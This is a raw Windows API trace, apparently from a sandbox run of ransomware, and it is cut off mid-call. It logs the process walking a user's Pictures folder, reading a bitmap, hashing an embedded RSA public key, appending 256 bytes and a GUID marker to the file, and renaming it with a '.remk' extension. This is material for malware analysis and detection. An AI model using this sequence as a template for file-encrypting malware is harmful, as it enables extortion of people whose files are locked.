(in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59df8150, ftCreationTime.dwHighDateTime=0x1d5e489, ftLastAccessTime.dwLowDateTime=0x4ad4520, ftLastAccessTime.dwHighDateTime=0x1d5db18, ftLastWriteTime.dwLowDateTime=0x4ad4520, ftLastWriteTime.dwHighDateTime=0x1d5db18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0236.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0236.618] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59df8150, ftCreationTime.dwHighDateTime=0x1d5e489, ftLastAccessTime.dwLowDateTime=0x4ad4520, ftLastAccessTime.dwHighDateTime=0x1d5db18, ftLastWriteTime.dwLowDateTime=0x4ad4520, ftLastWriteTime.dwHighDateTime=0x1d5db18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.618] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc2d420, ftCreationTime.dwHighDateTime=0x1d5db4f, ftLastAccessTime.dwLowDateTime=0x1a80340, ftLastAccessTime.dwHighDateTime=0x1d5de6c, ftLastWriteTime.dwLowDateTime=0x1a80340, ftLastWriteTime.dwHighDateTime=0x1d5de6c, nFileSizeHigh=0x0, nFileSizeLow=0xcb3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94ufH0b5CBCbVk2g4.bmp", cAlternateFileName="94UFH0~1.BMP")) returned 1 [0236.618] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\94ufH0b5CBCbVk2g4.bmp") returned=".bmp" [0236.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\94ufH0b5CBCbVk2g4.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\94ufh0b5cbcbvk2g4.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.619] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=52026) returned 1 [0236.619] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.621] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xcb14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.621] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.624] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xcb3a, lpOverlapped=0x0) returned 1 [0236.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.625] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.625] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.625] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.626] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.626] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.626] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.626] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.626] GetLastError () returned 0x0 [0236.626] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.626] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.626] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.626] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.626] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xcb40) returned 0x37cf820 [0236.627] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ced00 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7b0 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ced48 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.628] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc810 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc7f8 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.629] GetCurrentThreadId () returned 0x314 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5e20 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.630] GetCurrentThreadId () returned 0x314 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc870 [0236.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc888 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc828 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc888 | out: hHeap=0x630000) returned 1 [0236.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.634] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xcb3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.634] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.635] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.635] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.635] CloseHandle (hObject=0x640) returned 1 [0236.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x6a2d00 [0236.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0236.637] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\94ufH0b5CBCbVk2g4.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\94ufh0b5cbcbvk2g4.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\94ufH0b5CBCbVk2g4.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\94ufh0b5cbcbvk2g4.bmp.remk")) returned 1 [0236.639] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2cfc000, ftCreationTime.dwHighDateTime=0x1d5e6b9, ftLastAccessTime.dwLowDateTime=0x860399d0, ftLastAccessTime.dwHighDateTime=0x1d5df23, ftLastWriteTime.dwLowDateTime=0x860399d0, ftLastWriteTime.dwHighDateTime=0x1d5df23, nFileSizeHigh=0x0, nFileSizeLow=0xecb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ayZ1BTswz7VJrGpFc2.gif", cAlternateFileName="AYZ1BT~1.GIF")) returned 1 [0236.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.639] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\ayZ1BTswz7VJrGpFc2.gif") returned=".gif" [0236.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\ayZ1BTswz7VJrGpFc2.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\ayz1btswz7vjrgpfc2.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 